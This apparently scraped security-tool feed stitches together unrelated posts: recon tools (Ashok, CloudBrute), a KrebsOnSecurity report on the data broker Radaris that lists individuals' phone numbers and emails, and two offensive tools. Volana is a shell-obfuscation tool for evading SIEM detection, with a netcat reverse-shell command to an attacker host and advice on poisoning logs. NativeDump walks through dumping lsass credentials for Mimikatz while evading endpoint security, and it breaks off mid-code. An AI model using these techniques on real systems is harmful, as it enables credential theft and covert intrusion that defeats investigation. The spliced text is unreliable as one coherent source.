
Ashok - An OSINT Recon Tool, A.K.A. Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing: gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and the Wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide, including an index of the available options, is available in the Usage section of the wiki.

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits




    CloudBrute - Awesome Cloud Enumerator

    By: Zion3R


    A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The results are useful for bug bounty hunters, red teamers, and penetration testers alike.

    The complete write-up is available here.


    Motivation

    We are always thinking about what we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
    Here is the list of issues with previous approaches that we tried to fix:

    • Separated wordlists
    • Lack of proper concurrency
    • Lack of support for all major cloud providers
    • Required authentication, keys, or cloud CLI access
    • Outdated endpoints and regions
    • Incorrect file storage detection
    • No support for proxies (useful for bypassing region restrictions)
    • No support for user-agent randomization (useful for bypassing rare restrictions)
    • Hard to use, poorly configured

    Features

    • Cloud detection (IPINFO API and Source Code)
    • Supports all major providers
    • Black-Box (unauthenticated)
    • Fast (concurrent)
    • Modular and easily customizable
    • Cross-platform (Windows, Linux, macOS)
    • User-Agent Randomization
    • Proxy Randomization (HTTP, Socks5)

    Supported Cloud Providers

    Microsoft: Storage, Apps

    Amazon: Storage, Apps

    Google: Storage, Apps

    DigitalOcean: Storage

    Vultr: Storage

    Linode: Storage

    Alibaba: Storage

    Version

    1.0.0

    Usage

    Just download the latest release for your operating system and follow the usage instructions.

    To make the best use of this tool, you have to understand how to configure it correctly. Your downloaded version contains a config folder with a config.yaml file inside.

    It looks like this:

    providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
    environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
    proxytype: "http" # socks5 / http
    ipinfo: "" # IPINFO.io API KEY

    For the IPINFO API, you can register and get a free key at IPINFO. The environments are used to generate URLs, such as test-keyword.target.region and test.keyword.target.region.

    We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before running the tool.

    After setting up your API key, you are ready to use CloudBrute.

    [CloudBrute ASCII art banner]
    V 1.0.7
    usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
    -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
    <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
    [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
    [-m|--mode "<value>"] [-o|--output "<value>"]
    [-C|--configFolder "<value>"]

    Awesome Cloud Enumerator

    Arguments:

    -h --help Print help information
    -d --domain domain
    -k --keyword keyword used to generator urls
    -w --wordlist path to wordlist
    -c --cloud force a search, check config.yaml providers list
    -t --threads number of threads. Default: 80
    -T --timeout timeout per request in seconds. Default: 10
    -p --proxy use proxy list
    -a --randomagent user agent randomization
    -D --debug show debug logs. Default: false
    -q --quite suppress all output. Default: false
    -m --mode storage or app. Default: storage
    -o --output Output file. Default: out.txt
    -C --configFolder Config path. Default: config


    For example:

    CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

    Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutations, you have to use it for both the domain (-d) and keyword (-k) arguments, as in the example below.
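
    For instance, an illustrative command based on the example above (not taken verbatim from the CloudBrute documentation):

    CloudBrute -d target.com -k target.com -m storage -t 80 -T 10 -w "./data/storage_small.txt"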

    If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

    CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt

    Dev

    • Clone the repo
    • go build -o CloudBrute main.go
    • go test internal

    in action

    How to contribute

    • Add a module or fix something and then open a pull request.
    • Share it with whomever you believe can use it.
    • Do the extra work and share your findings with the community ♥

    FAQ

    How to make the best out of this tool?

    Read the usage.

    I get errors; what should I do?

    Make sure you read the usage correctly, and if you think you have found a bug, open an issue.

    When I use proxies, I get too many errors, or it's too slow?

    That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify which proxies work with your chosen provider.

    Too fast or too slow?

    Change the -T (timeout) option to get the best results for your run.

    Credits

    Inspired by every single repo listed here.



    KrebsOnSecurity Threatened with Defamation Lawsuit Over Fake Radaris CEO

    On March 8, 2024, KrebsOnSecurity published a deep dive on the consumer data broker Radaris, showing how the original owners are two men in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites. The subjects of that piece are threatening to sue KrebsOnSecurity for defamation unless the story is retracted. Meanwhile, their attorney has admitted that the person Radaris named as the CEO from its inception is a fabricated identity.

    Radaris is just one cog in a sprawling network of people-search properties online that sell highly detailed background reports on U.S. consumers and businesses. Those reports typically include the subject’s current and previous addresses, partial Social Security numbers, any known licenses, email addresses and phone numbers, as well as the same information for any of their immediate relatives.

    Radaris has a less-than-stellar reputation when it comes to responding to consumers seeking to have their reports removed from its various people-search services. That poor reputation, combined with indications that the true founders of Radaris have gone to extraordinary lengths to conceal their stewardship of the company, was what prompted KrebsOnSecurity to investigate the origins of Radaris in the first place.

    On April 18, KrebsOnSecurity received a certified letter (PDF) from Valentin “Val” Gurvits, an attorney with the Boston Law Group, stating that KrebsOnSecurity would face a withering defamation lawsuit unless the Radaris story was immediately retracted and an apology issued to the two brothers named in the story as co-founders.

    That March story worked backwards from the email address used to register radaris.com, and charted an impressive array of data broker companies created over the past 15 years by Massachusetts residents Dmitry and Igor Lubarsky (also sometimes spelled Lybarsky or Lubarski). Dmitry goes by “Dan,” and Igor uses the name “Gary.”

    Those businesses included numerous websites marketed to Russian-speaking people who are new to the United States, such as russianamerica.com, newyork.ru, russiancleveland.com, russianla.com, russianmiami.com, etc. Other domains connected to the Lubarskys included Russian-language dating and adult websites, as well as affiliate programs for their international calling card businesses.

    A mind map of various entities apparently tied to Radaris and the company’s co-founders.

    The story on Radaris noted that the Lubarsky brothers registered most of their businesses using a made-up name — “Gary Norden,” sometimes called Gary Nord or Gary Nard.

    Mr. Gurvits’ letter stated emphatically that my reporting was lazy, mean-spirited, and obviously intended to smear the reputation of his clients. By way of example, Mr. Gurvits said the Lubarskys were actually Ukrainian, and that the story painted his clients in a negative light by insinuating that they were somehow associated with Radaris and with vaguely nefarious elements in Russia.

    But more to the point, Mr. Gurvits said, neither of his clients were Gary Norden, and neither had ever held any leadership positions at Radaris, nor were they financial beneficiaries of the company in any way.

    “Neither of my clients is a founder of Radaris, and neither of my clients is the CEOs of Radaris,” Gurvits wrote. “Additionally, presently and going back at least the past 10 years, neither of my clients are (or were) officers or employees of Radaris. Indeed, neither of them even owns (or ever owned) any equity in Radaris. In intentional disregard of these facts, the Article implies that my clients are personally responsible for Radaris’ actions. Therefore, you intentionally caused all negative allegations in the Article made with respect to Radaris to be imputed against my clients personally.”

    Dan Lubarsky’s Facebook page, just prior to the March 8 story about Radaris, said he was from Moscow.

    We took Mr. Gurvits’ word on the ethnicity of his clients, and adjusted the story to remove a single mention that they were Russian. We did so even though Dan Lubarsky’s own Facebook page said (until recently) that he was from Moscow, Russia.

    KrebsOnSecurity asked Mr. Gurvits to explain precisely which other details in the story were incorrect, and replied that we would be happy to update the story with a correction if they could demonstrate any errors of fact or omission.

    We also requested specifics about several aspects of the story, such as the identity of the current Radaris CEO — listed on the Radaris website as “Victor K.” Mr. Gurvits replied that Radaris is and always has been based in Ukraine, and that the company’s true founder “Eugene L” is based there.

    While Radaris has claimed to have offices in Massachusetts, Cyprus and Latvia, its website has never mentioned Ukraine. Mr. Gurvits has not responded to requests for more information about the identities of “Eugene L” or “Victor K.”

    Gurvits said he had no intention of doing anyone’s reporting for them, and that the Lubarskys were going to sue KrebsOnSecurity for defamation unless the story was retracted in full. KrebsOnSecurity replied that journalists often face challenges to things that they report, but it is more than rare for one who makes a challenge to take umbrage at being asked for supporting information.

    On June 13, Mr. Gurvits sent another letter (PDF) that continued to claim KrebsOnSecurity was defaming his clients, only this time Gurvits said his clients would be satisfied if KrebsOnSecurity just removed their names from the story.

    “Ultimately, my clients don’t care what you say about any of the websites or corporate entities in your Article, as long as you completely remove my clients’ names from the Article and cooperate with my clients to have copies of the Article where my clients’ names appear removed from the Internet,” Mr. Gurvits wrote.

    MEET THE FAKE RADARIS CEO

    The June 13 letter explained that the name Gary Norden was a pseudonym invented by the Radaris marketing division, but that neither of the Lubarsky brothers were Norden.

    This was a startling admission, given that Radaris has quoted the fictitious Gary Norden in press releases published and paid for by Radaris, and in news media stories where the company is explicitly seeking money from investors. In other words, Radaris has been misrepresenting itself to investors from the beginning. Here’s a press release from Radaris that was published on PR Newswire in April 2011:

    A press release published by Radaris in 2011 names the CEO of Radaris as Gary Norden, which was a fake name made up by Radaris’ marketing department.

    In April 2014, the Boston Business Journal published a story (PDF) about Radaris that extolled the company’s rapid growth and considerable customer base. The story noted that, “to date, the company has raised less than $1 million from Cyprus-based investment company Difive.”

    “We live in a world where information becomes much more broad and much more available every single day,” the Boston Business Journal quoted Radaris’ fake CEO Gary Norden, who by then had somehow been demoted from CEO to vice president of business development.

    A Boston Business Journal story from April 2014 quotes the fictitious Radaris CEO Gary Norden.

    “We decided there needs to be a service that allows for ease of monitoring of information about people,” the fake CEO said. The story went on to say Radaris was seeking to raise between $5 million and $7 million from investors in the ensuing months.

    THE BIG LUBARSKY

    In his most recent demand letter, Mr. Gurvits helpfully included resumes for both of the Lubarsky brothers.

    Dmitry Lubarsky’s resume states he is the owner of Difive.com, a startup incubator for IT companies. Recall that Difive is the same company mentioned by the fake Radaris CEO in the 2014 Boston Business Journal story, which said Difive was the company’s initial and sole investor.

    Difive’s website in 2016 said it had offices in Boston, New York, San Francisco, Riga (Latvia) and Moscow (nothing in Ukraine). Meanwhile, DomainTools.com reports difive.com was originally registered in 2007 to the fictitious Gary Norden from Massachusetts.

    Archived copies of the Difive website from 2017 include a “Portfolio” page indexing all of the companies in which Difive has invested. That list, available here, includes virtually every “Gary Norden” domain name mentioned in my original report, plus a few that escaped notice earlier.

    Dan Lubarsky’s resume says he was CEO of a people search company called HumanBook. The Wayback machine at archive.org shows the Humanbook domain (humanbook.com) came online around April 2008, when the company was still in “beta” mode.

    By August 2008, however, humanbook.com had changed the name advertised on its homepage to Radaris Beta. Eventually, Humanbook simply redirected to radaris.com.

    Archive.org’s record of humanbook.com from 2008, just after its homepage changed to Radaris Beta.

    Astute readers may notice that the domain radaris.com is not among the companies listed as Difive investments. However, passive domain name system (DNS) records from DomainTools show that between October 2023 and March 2024 radaris.com was hosted alongside all of the other Gary Norden domains at the Internet address range 38.111.228.x.

    That address range simultaneously hosted every domain mentioned in this story and in the original March 2024 report as connected to email addresses used by Gary Norden, including radaris.com, radaris.ru, radaris.de, difive.com, privet.ru, blog.ru, comfi.com, phoneowner.com, russianamerica.com, eprofit.com, rehold.com, homeflock.com, humanbook.com and dozens more. A spreadsheet of those historical DNS entries for radaris.com is available here (.csv).

    Image: DomainTools.com

    The breach tracking service Constella Intelligence finds just two email addresses ending in difive.com have been exposed in data breaches over the years: dan@difive.com, and gn@difive.com. Presumably, “gn” stands for Gary Norden.

    A search on the email address gn@difive.com via the breach tracking service osint.industries reveals this address was used to create an account at Airbnb under the name Gary, with the last four digits of the account’s phone number ending in “0001.”

    Constella Intelligence finds gn@difive.com was associated with the Massachusetts number 617-794-0001, which was used to register accounts for “Igor Lybarsky” from Wellesley or Sherborn, Ma. at multiple online businesses, including audiusa.com and the designer eyewear store luxottica.com.

    The phone number 617-794-0001 also appears for a “Gary Nard” user at russianamerica.com. Igor Lubarsky’s resume says he was the manager of russianamerica.com.

    DomainTools finds 617-794-0001 is connected to registration records for three domains, including paytone.com, a domain that Dan Lubarsky’s resume says he managed. DomainTools also found that number on the registration records for trustoria.com, another major consumer data broker that has an atrocious reputation, according to the Better Business Bureau.

    Dan Lubarsky’s resume says he was responsible for several international telecommunications services, including the website comfi.com. DomainTools says the phone number connected to that domain — 617-952-4234 — was also used on the registration records for humanbook.net/biz/info/mobi/us, as well as for radaris.me, radaris.in, and radaris.tel.

    Two other key domains are connected to that phone number. The first is barsky.com, which is the website for Barsky Estate Realty Trust (PDF), a real estate holding company controlled by the Lubarskys. Naturally, DomainTools finds barsky.com also was registered to a Gary Norden from Massachusetts. But the organization listed in the barsky.com registration records is Comfi Inc., a VOIP communications firm that Dan Lubarsky’s resume says he managed.

    The other domain of note is unipointtechnologies.com. Dan Lubarsky’s resume says he was the CEO of Wellesley Hills, Mass-based Unipoint Technology Inc. In 2012, Unipoint was fined $179,000 by the U.S. Federal Communications Commission, which said the company had failed to apply for a license to provide international telecommunications services.

    A pandemic assistance loan granted in 2020 to Igor Lybarsky of Sherborn, Ma. shows the money went to an entity called Norden Consulting.

    Notice the name on the recipient of this government loan for Igor Lybarsky from Sherborn, Ma: Norden Consulting. 

    PATENTLY REMARKABLE

    The 2011 Radaris press release quoting their fake CEO Gary Norden said the company had four patents pending from a team of computer science PhDs. According to the resume shared by Mr. Gurvits, Dan Lubarsky has a PhD in computer science.

    The U.S. Patent and Trademark Office (PTO) says Dan Lubarsky/Lubarski has at least nine technology patents to his name. The fake CEO press release from Radaris mentioning its four patents was published in April 2011. By that time, the PTO says Dan Lubarsky had applied for exactly four patents, including, “System and Method for a Web-Based People Directory.” The first of those patents, published in 2009, is tied to Humanbook.com, the company Dan Lubarsky founded that later changed its name to Radaris.

    If the Lubarskys were never involved in Radaris, how do they or their attorney know the inside information that Gary Norden is a fiction of Radaris’ marketing department? KrebsOnSecurity has learned that Mr. Gurvits is the same attorney responding on behalf of Radaris in a lawsuit against the data broker filed earlier this year by Atlas Data Privacy.

    Mr. Gurvits also stepped forward as Radaris’ attorney in a class action lawsuit the company lost in 2017 because it never contested the claim in court. When the plaintiffs told the judge they couldn’t collect on the $7.5 million default judgment, the judge ordered the domain registry Verisign to transfer the radaris.com domain name to the plaintiffs.

    Mr. Gurvits appealed the verdict, arguing that the lawsuit hadn’t named the actual owners of the Radaris domain name — a Cyprus company called Bitseller Expert Limited — and thus taking the domain away would be a violation of their due process rights.

    The judge ruled in Radaris’ favor — halting the domain transfer — and told the plaintiffs they could refile their complaint. Soon after, the operator of Radaris changed from Bitseller to Andtop Company, an entity formed (PDF) in the Marshall Islands in Oct. 2020. Andtop also operates the aforementioned people-search service Trustoria.

    Mr. Gurvits’ most-publicized defamation case was a client named Aleksej Gubarev, a Russian technology executive whose name appeared in the Steele Dossier. That document included a collection of salacious, unverified information gathered by the former British intelligence officer Christopher Steele during the 2016 U.S. presidential campaign at the direction of former president Donald Trump’s political rivals.

    Gubarev, the head of the IT services company XBT Holding and the Florida web hosting firm Webzilla, sued BuzzFeed for publishing the Steele dossier. One of the items in the dossier alleged that XBT/Webzilla and affiliated companies played a key role in the hack of Democratic Party computers in the spring of 2016. The memo alleged Gubarev had been coerced into providing services to Russia’s main domestic security agency, known as the FSB.

    In December 2018, a federal judge in Miami ruled in favor of BuzzFeed, saying the publication was protected by the fair report privilege, which gives news organizations latitude in reporting on official government proceedings.

    Radaris was originally operated by Bitseller Expert Limited. Who owns Bitseller Expert Limited? A report (PDF) obtained from the Cyprus business registry shows this company lists its director as Pavel Kaydash from Moscow. Mr. Kaydash could not be reached for comment.

    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Zion3R


    Shell command obfuscation to avoid SIEM/detection systems

    During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making after-the-fact cleanup alone useless.

    volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, and volana executes it for you). This way you clear your tracks DURING your passage.


    Usage

    You need to get an interactive shell (find a way to spawn it; you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it: now you can type the commands you want to have executed stealthily.

    ## Download it from github release
    ## If you do not have internet access from compromised machine, find another way
    curl -LO https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
    volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
    volana » [command]

    Keywords for the volana console:
    • ring: enable ring mode, i.e. each command is launched along with plenty of others to cover your tracks (against solutions that monitor system calls)
    • exit: exit the volana console

    From a non-interactive shell

    Imagine you have a non-interactive shell (webshell or blind RCE); you can use the encrypt and decrypt subcommands. First, you need to build volana with an embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
    ## (Here, a nc bind shell to obtain an interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

    Copy the encrypted command and execute it with your RCE on the target machine:

    ./volana decr [encrypted_command]
    ## Now you have a bind shell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana).
    ## Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it)

    Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

    Because we want to be protected against systems that trigger an alert on base64 use or that look for base64 text in commands. We also want to make investigation difficult, and base64 isn't a real obstacle.

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

    By "detected" we mean being able to trigger an alert when a certain command has been executed.

    Hide from

    Only the command line that launches volana will be caught. However, by adding a leading space before executing it, the default bash behavior is to not save it in history.

    • Detection systems that are based on history command output
    • Detection systems that are based on history files
      • .bash_history, .zsh_history, etc.
    • Detection systems that are based on bash debug traps
    • Detection systems that are based on sudo's built-in logging system
    • Detection systems tracing all process syscalls system-wide (e.g. opensnoop)
    • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
      • Easy to detect & avoid: pkill -9 script
      • Not a common case
      • screen is a bit more difficult to avoid; however, it does not register input (secret input: stty -echo => avoided)
    • Command detection could be avoided with volana with encryption

    Visible for

    • Detection systems that have alert for unknown command (volana one)
    • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
    • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
    • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
    • Custom LD_PRELOAD injection to make log
    • Not a common case at all

    Bug bounty

    Sorry for the clickbait title, but no money will be provided to contributors. 🐛

    Let me know if you have found:
    • a way to detect volana
    • a way to spy on the console that does not detect volana commands
    • a way to avoid a detection system

    Report here

    Credit



    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Zion3R


    NativeDump allows you to dump the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (the SystemInfo, ModuleList and Memory64List streams).


    • NtOpenProcessToken and NtAdjustPrivilegesToken to get the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp":

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoint, CrowdStrike...) and is for now undetected. However, it does not work if PPL is enabled on the system.

    Some benefits of this technique are:
    • It does not use the well-known dbghelp!MinidumpWriteDump function
    • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
    • The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading about the undocumented Minidump structures, the format can be summed up as:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-byte structure which can be defined in C# as:

    public struct MinidumpHeader
    {
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
    }

    The required values are:
    • Signature: Fixed value 0x504D444D (the "MDMP" string)
    • Version: Fixed value 0xA793 (the Microsoft constant MINIDUMP_VERSION)
    • NumberOfStreams: Fixed value 3, the three streams required for the file
    • StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
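
    As a minimal illustration (not code from the NativeDump repository), the MinidumpHeader struct above can simply be filled with these fixed values; how the struct is then marshalled into the output buffer is left out of this sketch:

    // Hedged sketch: populate the MinidumpHeader struct from section A with the fixed values above
    var header = new MinidumpHeader
    {
        Signature = 0x504D444D,      // "MDMP"
        Version = 0xA793,            // MINIDUMP_VERSION
        ImplementationVersion = 0,
        NumberOfStreams = 3,         // SystemInfo, ModuleList and Memory64List
        StreamDirectoryRva = 0x20,   // the Stream Directory starts right after the 32-byte header
        CheckSum = 0,
        TimeDateStamp = IntPtr.Zero
    };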


    B. Stream Directory

    Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
    public uint StreamType;
    public uint Size;
    public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream
    0x16 ProcessVmCountersStream
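
    As a hedged sketch (not taken from the NativeDump source), the three directory entries used in this file can be built from the stream IDs above together with the sizes and offsets given in sections C to E below:

    // Sketch: one MinidumpStreamDirectoryEntry per stream, in file order
    var directory = new[]
    {
        new MinidumpStreamDirectoryEntry { StreamType = 0x07, Size = 56,  Location = 0x44  }, // SystemInfoStream
        new MinidumpStreamDirectoryEntry { StreamType = 0x04, Size = 112, Location = 0x7C  }, // ModuleListStream
        new MinidumpStreamDirectoryEntry { StreamType = 0x09, Size = 0,   Location = 0x12A }, // Memory64ListStream; the real size depends on the region count
    };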

    C. SystemInformation Stream

    The first stream is a SystemInformation stream, with ID 7. Its size is 56 bytes and it is located at offset 68 (0x44), right after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
    }

    The required values are:
    • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
    • MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
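
    The version query itself can be done with a plain P/Invoke into ntdll. The snippet below is a self-contained sketch (the OSVERSIONINFOW struct mirrors the documented RTL_OSVERSIONINFOW layout and is not part of the code shown in this post); only the major, minor and build values are needed for the stream:

    using System.Runtime.InteropServices;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct OSVERSIONINFOW
    {
        public uint dwOSVersionInfoSize;
        public uint dwMajorVersion;
        public uint dwMinorVersion;
        public uint dwBuildNumber;
        public uint dwPlatformId;
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string szCSDVersion;
    }

    class OsVersion
    {
        [DllImport("ntdll.dll")]
        static extern int RtlGetVersion(ref OSVERSIONINFOW versionInformation);

        // Returns the three values required for the SystemInformation stream
        public static (uint Major, uint Minor, uint Build) Get()
        {
            var info = new OSVERSIONINFOW { dwOSVersionInfoSize = (uint)Marshal.SizeOf<OSVERSIONINFOW>() };
            RtlGetVersion(ref info);   // returns an NTSTATUS; 0 (STATUS_SUCCESS) on success
            return (info.dwMajorVersion, info.dwMinorVersion, info.dwBuildNumber);
        }
    }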


    D. ModuleList Stream

    The second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size of 112 bytes, since it contains the entry of a single module, the only one needed for the parsing to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
    }

    As there is only one, it gets simplified to:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
    }

    The required values are:
    • NumberOfModules: Fixed value 1
    • BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
    • Size: Obtained by adding all memory region sizes starting from BaseAddress until reaching one with a size of 4096 bytes (0x1000), the .text section of another library
    • PointerName: The Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


    E. Memory64List Stream

    The third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

    public struct Memory64ListStream
    {
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
    }

    Each memory region entry is a 16-byte structure:

    public struct Memory64Info
    {
    public IntPtr Address;
    public IntPtr Size;
    }

    The required values are:
    • NumberOfEntries: Number of memory regions, obtained after looping over the memory regions
    • MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding the size of all 16-byte memory entries to the start of the stream
    • Address and Size: Obtained for each valid region while looping over them
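
    A small hedged sketch (field names follow the structs in this section; CollectRegions is a hypothetical placeholder for the loop described in section F, and the header-size arithmetic is an assumption based on the description above):

    Memory64Info[] regions = CollectRegions();        // hypothetical helper, see section F
    const uint memory64ListOffset = 0x12A;            // stream location given above
    const uint streamHeaderSize = 8 + 4;              // NumberOfEntries (ulong) + MemoryRegionsBaseAddress (uint)

    var memory64List = new Memory64ListStream
    {
        NumberOfEntries = (ulong)regions.Length,
        // Region bytes start right after this header and the 16-byte entries
        MemoryRegionsBaseAddress = memory64ListOffset + streamHeaderSize + (uint)(regions.Length * 16),
        MemoryInfoEntries = regions
    };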


    F. Looping memory regions

    There are prerequisites to looping over the memory regions of the lsass.exe process, which can be solved using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical advapi32!OpenProcessToken, advapi32!LookupPrivilegeValue and advapi32!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions); see the sketch after this list
    2. Obtain the process ID. For example, loop over all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes
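
    A self-contained sketch of step 1, as an illustration of the NTAPI route rather than the actual project code (the constants follow the usual Windows SDK definitions and the hardcoded LUID value 20 is the one mentioned above):

    using System;
    using System.Runtime.InteropServices;

    class DebugPrivilege
    {
        [StructLayout(LayoutKind.Sequential)]
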